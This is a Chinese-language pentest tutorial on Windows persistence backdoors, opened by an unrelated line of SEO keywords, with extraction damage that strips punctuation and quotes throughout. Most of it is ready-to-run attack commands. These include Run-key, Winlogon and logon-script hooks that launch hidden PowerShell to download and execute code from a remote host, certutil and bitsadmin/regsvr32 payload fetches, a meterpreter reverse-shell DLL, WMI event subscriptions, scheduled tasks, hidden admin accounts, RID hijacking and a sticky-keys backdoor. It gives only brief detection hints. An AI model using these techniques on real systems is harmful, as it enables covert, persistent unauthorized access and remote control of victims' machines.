毕业设计做系统网站好,简单软件开发工具,网站建设模板ppt模板,法库网站建设注册表类#xff1a; 普通注册表后门 在一般用户权限下#xff0c;通常是将要执行的后门程序或脚本路径填写到如下注册表的键值中HKCU\Software\Microsoft\Windows\CurrentVersion\Run#xff0c;键名任意。普通权限即可运行 cmd下操作#xff1a; reg add HKEY_…注册表类 普通注册表后门 在一般用户权限下通常是将要执行的后门程序或脚本路径填写到如下注册表的键值中HKCU\Software\Microsoft\Windows\CurrentVersion\Run键名任意。普通权限即可运行 cmd下操作 reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Pentestlab /t REG_SZ /d C:\Users\administrator\desktop\pentestlab.exe powershell下操作 Set-ItemProperty HKCU:\Software\Microsoft\Windows\CurrentVersion\Run\ Pentestlab C:\Users\administrator\desktop\pentestlab.exe -Forc 电脑重启后上线 除了上面的位置之外还有下面的位置可以让我们实现权限维持 HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce 上面的是针对于用户的注册表下面的这几个是针对本地计算机的注册表 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce 添加载荷的方法的自然也和之前的一样了只是所处的位置不同罢了注意service的程序。而防御与检测策略也是比较好做的在这些的注册表的位置查看是否有可疑程序即可。 Winlogon Helper DLL后门 Winlogon是一个Windows组件用来处理各种活动如登录、注销、身份验证期间加载用户配置文件、关闭、锁定屏幕等。这种行为由注册表管理该注册表定义在Windows登录期间启动哪些进程。所以我们可以依靠这个注册表来进行权限维持。 注册表位置如下 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify 其中的userinit与shell主要是来运行exe程序而notify则用来执行dll文件Windows 7之前。   而userinit又可以通过powershell的方式来实现无文件后门用法如下 PS C:\Users\Administrator Set-ItemProperty HKLM:\SOFTWARE\Microsoft\WINDOWS NT\CurrentVersion\Winlogon -name Userinit -value C:\Windows\system32\userinit.exe,powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring(http://192.168.31.109:8080/a)) 注意代码引号的转义问题。可以使用反引号绕过。 Logon Scripts后门 注册表路径: HKCU\Environment\ 创建字符串键值: UserInitMprLogonScript cmd下操作 reg add HKCU:\Environment\ /v UserInitMprLogonScript /t REG_SZ /d C:\1.bat powershell下操作 Set-ItemProperty HKCU:\Environment\ UserInitMprLogonScript C:\1.bat -Force bat内容如下 powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring(http://192.168.31.109:8080/a)) Logon Scripts是优先于很多杀毒软件启动部分杀毒是优先于他启动的所以可以通过这种方式将powershell命令写到bat脚本中达到免杀隐藏启动的效果。 缺点就是需要留文件并不方便。 注册表之CLR CLR全称为Common Language Runtime公共语言运行库是一个可由多种编程语言使用的运行环境。 要使clr能够劫持系统中全部.net程序需要设置环境变量要是只用命令行可以使用wmi。 直接给出批处理文件 wmic ENVIRONMENT create nameCOR_ENABLE_PROFILING,username%username%,VariableValue1 wmic ENVIRONMENT create nameCOR_PROFILER,username%username%,VariableValue{11111111-1111-1111-1111-111111111111} certutil.exe -urlcache -split -f yourdll certutil.exe -urlcache -split -f yourdll delete SET KEYHKEY_CURRENT_USER\Software\Classes\CLSID\{11111111-1111-1111-1111-111111111111}\InProcServer32 REG.EXE ADD %KEY% /VE /T REG_SZ /D %CD%\msg.dll /F REG.EXE ADD %KEY% /V ThreadingModel /T REG_SZ /D Apartment /F x64 wmic ENVIRONMENT create nameCOR_ENABLE_PROFILING,username%username%,VariableValue1 wmic ENVIRONMENT create nameCOR_PROFILER,username%username%,VariableValue{11111111-1111-1111-1111-111111111111} certutil.exe -urlcache -split -f https://raw.githubusercontent.com/3gstudent/test/master/msg.dll certutil.exe -urlcache -split -f https://raw.githubusercontent.com/3gstudent/test/master/msg.dll delete certutil.exe -urlcache -split -f https://raw.githubusercontent.com/3gstudent/test/master/msg_x64.dll certutil.exe -urlcache -split -f https://raw.githubusercontent.com/3gstudent/test/master/msg_x64.dll delete SET KEYHKEY_CURRENT_USER\Software\Classes\CLSID\{11111111-1111-1111-1111-111111111111}\InProcServer32 REG.EXE ADD %KEY% /VE /T REG_SZ /D %CD%\msg_x64.dll /F REG.EXE ADD %KEY% /V ThreadingModel /T REG_SZ /D Apartment /F SET KEYHKEY_CURRENT_USER\Software\Classes\WoW6432Node\CLSID\{11111111-1111-1111-1111-111111111111}\InProcServer32 REG.EXE ADD %KEY% /VE /T REG_SZ /D %CD%\msg.dll /F REG.EXE ADD %KEY% /V ThreadingModel /T REG_SZ /D Apartment /F 内部工具类 waitfor.exe 该工具用来同步网络中计算机可以发送或等待系统上的信号。 支持下列操作系统 Windows Server 2003 Windows Vista Windows XP Windows Server 2008 Windows 7 Windows Server 2003 with SP2 Windows Server 2003 R2 Windows Server 2008 R2 Windows Server 2000 Windows Server 2012 Windows Server 2003 with SP1 Windows 8 Windows 10 首先新建一个powershell文件内容为 start-process calc.execmd /c waitfor persist powershell -executionpolicy bypass -file c:\test\1.ps1 然后开启等待 waitfor persist1 powershell -executionpolicy bypass -file c:\test\1.ps1 另一个cmd waitfor /s 127.0.0.1 /si persist1 即可成功调用cmd。 注意低版本powershell会报错 或者使用三好学生师傅的脚本 #A quick POC to use Waitfor.exe to maintain persistenceAuthor: 3gstudent 3gstudentLearn from:https://twitter.com/danielhbohannon/status/872258924078092288 # $StaticClass New-Object Management.ManagementClass(root\cimv2, $null,$null) $StaticClass.Name Win32_Backdoor $StaticClass.Put()| Out-Null $StaticClass.Properties.Add(Code , cmd /c start calc.exe taskkill /f /im powershell.exe waitfor persist powershell -nop -W Hidden -E JABlAHgAZQBjAD0AKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwBXAGkAbgAzADIAXwBCAGEAYwBrAGQAbwBvAHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAQwBvAGQAZQAnAF0ALgBWAGEAbAB1AGUAOwAgAGkAZQB4ACAAJABlAHgAZQBjAA) $StaticClass.Put() | Out-Null$exec([WmiClass] Win32_Backdoor).Properties[Code].Value; iex $exec | Out-Null 然后使用下面的方式开启 powershell -executionpolicy bypass .\test.ps1 waitfor /s 127.0.0.1 /si persist 即可看到效果。 bitsadmin win7之后进行上传下载的工具。 利用方法如下 PS C:\Users\Administrator bitsadmin /create backdoor PS C:\Users\Administrator bitsadmin /addfile backdoor c:\windows\system32\calc.exe c:\Users\administrator\Desktop\calc.exe PS C:\Users\Administrator bitsadmin.exe /SetNotifyCmdLine backdoor regsvr32.exe /u /s /i:http://192.168.31.109/calc.sct scrobj.dll PS C:\Users\Administrator bitsadmin /Resume backdoor 当然换成msf的sct也就可以上线了。白名单运行程序不仅仅只有regsvr32还有别的很多可以去查下资料 可以使用下面的方法进行检测 PS C:\Users\Administrator bitsadmin /list /verbose msdtc加载后门 msdtc.exe 存在于组环境和域环境中,是微软的一个分布式事物处理协调器服务。要求处于工作组或者域环境内。 因为他在启动时会默认加载oci.dllSQLLib80.dll和xa80.dll。Windows系统默认不包含oci.dll。 我们将后门dll将其重命名为oci.dll并将其放置在%SystemRoot%\system32\中那么重启时就会加载我们的dll然后得到一个session。 注意dll版本要根据目标机器的位数来生成。 msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST192.168.31.109 LPORT4444 -f dll oci.dllcmd或powershell下执行 taskkill /f /im msdtc.exe net start msdtc 即可获得会话。 wmi执行后门技术 WMI可以描述为一组管理Windows系统的方法和功能。我们可以把它当作API来与Windows系统进行相互交流。WMI在渗透测试中的价值在于它不需要下载和安装 因为WMI是Windows系统自带功能。而且整个运行过程都在计算机内存中发生不会留下任何痕迹。 在使用wmi进行权限维持的时候我们一般用到下面的三个类 __EventFilter EventConsumer __FilterToConsumerBinding 下面我们看下他的利用方式首先是mof。 msf先生成一个web的监听然后使用msf生成文件。 irbputs generate_mof(Metasploit1,regsvr32 /s /n /u /i:http://192.168.31.109:8080/RjdtuMLURHfkH.sct scrobj.dll) 然后编译mof mofcomp.exe .\Metasploit.mof 即可得到会话。第二种方式就是使用wmi事件。 命令如下 wmic /NAMESPACE:\\root\subscription PATH __EventFilter CREATE NamePentestLab, EventNameSpaceroot\cimv2,QueryLanguageWQL, QuerySELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA Win32_PerfFormattedData_PerfOS_System wmic /NAMESPACE:\\root\subscription PATH CommandLineEventConsumer CREATE NamePentestLab, ExecutablePathC:\users\administrator\desktop\msf.exe,CommandLineTemplateC:\users\administrator\desktop\msf.exe wmic /NAMESPACE:\\root\subscription PATH __FilterToConsumerBinding CREATE Filter__EventFilter.Name\PentestLab\, ConsumerCommandLineEventConsumer.Name\PentestLab\ 然后重启电脑60s后反弹会话。 powershell版本 $FilterArgs {namePentestlab-WMI;EventNameSpaceroot\CimV2;QueryLanguageWQL;QuerySELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA Win32_PerfFormattedData_PerfOS_System AND TargetInstance.SystemUpTime 240 AND TargetInstance.SystemUpTime 325}; $FilterNew-CimInstance -Namespace root/subscription -ClassName __EventFilter -Property $FilterArgs$ConsumerArgs {namePentestlab-WMI;CommandLineTemplate$($Env:SystemRoot)\System32\pentestlab.exe;} $ConsumerNew-CimInstance -Namespace root/subscription -ClassName CommandLineEventConsumer -Property $ConsumerArgs$FilterToConsumerArgs { Filter [Ref] $Filter; Consumer [Ref] $Consumer; } $FilterToConsumerBinding New-CimInstance -Namespace root/subscription -ClassName __FilterToConsumerBinding -Property $FilterToConsumerArgs 如果想要删除的话可以使用下面的命令 $EventConsumerToCleanup Get-WmiObject -Namespace root/subscription -Class CommandLineEventConsumer -Filter Name Pentestlab-WMI $EventFilterToCleanup Get-WmiObject -Namespace root/subscription -Class __EventFilter -Filter Name Pentestlab-WMI $FilterConsumerBindingToCleanup Get-WmiObject -Namespace root/subscription -Query REFERENCES OF {$($EventConsumerToCleanup.__RELPATH)} WHERE ResultClass __FilterToConsumerBinding$FilterConsumerBindingToCleanup | Remove-WmiObject $EventConsumerToCleanup | Remove-WmiObject $EventFilterToCleanup | Remove-WmiObject powershell版本的也可以直接使用别人写好的脚本https://github.com/n0pe-sled/WMI-Persistence/blob/master/WMI-Persistence.ps1 当然以下工具都具有该功能Empire、SharpSploit、PoshC2、PowerLurk、WMIPersist、 而对于此类攻击的检测就查看上面所说的那三种类就可以了。 #List Event Filters Get-WMIObject -Namespace root\Subscription -Class __EventFilter#List Event Consumers Get-WMIObject -Namespace root\Subscription -Class __EventConsumer#List Event Bindings Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding 且能发现木马的踪迹 计划任务 经典中的经典。 schtasks.exe /Create /TN update /TR xx(你要执行的命令) /SC ONLOGON /F /RL HIGHEST demo C:\Users\Administratorschtasks /create /sc minute /mo 1 /tn chrome /tr wscript.exe C:\users\Administrator\Desktop\msf.vbs 或者使用powershell无文件加载也是可以的。 WinRM服务后门 基本原理是使用Windows 的远程管理管理服务WinRM组合HTTP.sys驱动自带的端口复用功能一起实现正向的端口复用后门。后门连接是需要目标服务器的高权用户的明文密码的需要先抓取相应的明文密码才可部署后门。 下面是部署方法 winrm set winrm/config/service {EnableCompatibilityHttpListenertrue} //开启监听 winrm set winrm/config/Listener?Address*TransportHTTP {Port80}　//更改wimrm的端口防止被怀疑 查看状态 winrm e winrm/config/listener 然后链接后门本地做如下设置 winrm quickconfig -q winrm set winrm/config/Client {TrustedHosts*} 然后连接后门获得cmd环境。 C:\Users\Administratorwinrs -r:http://192.168.31.94 -u:administrator -p:abc123! cmd 如果是非管理员用户用下面的方法修改注册表即可。 reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f 修改系统服务 使用sc制作权限维持 #创建Fax传真服务并设置为自启动 sc create Fax binPath C:\123123.exe start auto obj LocalSystem #增加服务描述 sc descrīption Fax #启动 sc start Fax 重启获得会话。 记得监听添加下面的参数防止假死 set autorunscript migrate -f dll劫持 这个看个人的思路以及编码能力了比如劫持个安全狗 远程登录类 影子账户、克隆账户、激活guest net user test$ 123456 /addnet localgroup administrators test$ /add net user guest /active:yes net user guest 1234 net localgroup administrators guest /add rid_hijack 通过劫持有效帐户的RID来在注册表中进行修改以使Guest帐户成为管理员 msf5 post(windows/manage/rid_hijack) set session 5 session 5 msf5 post(windows/manage/rid_hijack) set getsystem true getsystem true msf5 post(windows/manage/rid_hijack) set guest_account true guest_account true msf5 post(windows/manage/rid_hijack) set password 123!ASQs password 123!ASQs msf5 post(windows/manage/rid_hijack) exploit 然后impacket链接 shift后门 C:\Windows\System32\sethc.exe 粘滞键启动快捷键按五次shift键 C:\Windows\System32\utilman.exe 设置中心启动快捷键WindowsU键 cd c:\Windows\System32 move sethc.exe sethc.exe.bak copy cmd.exe sethc.exe 高版本的话就映像劫持吧。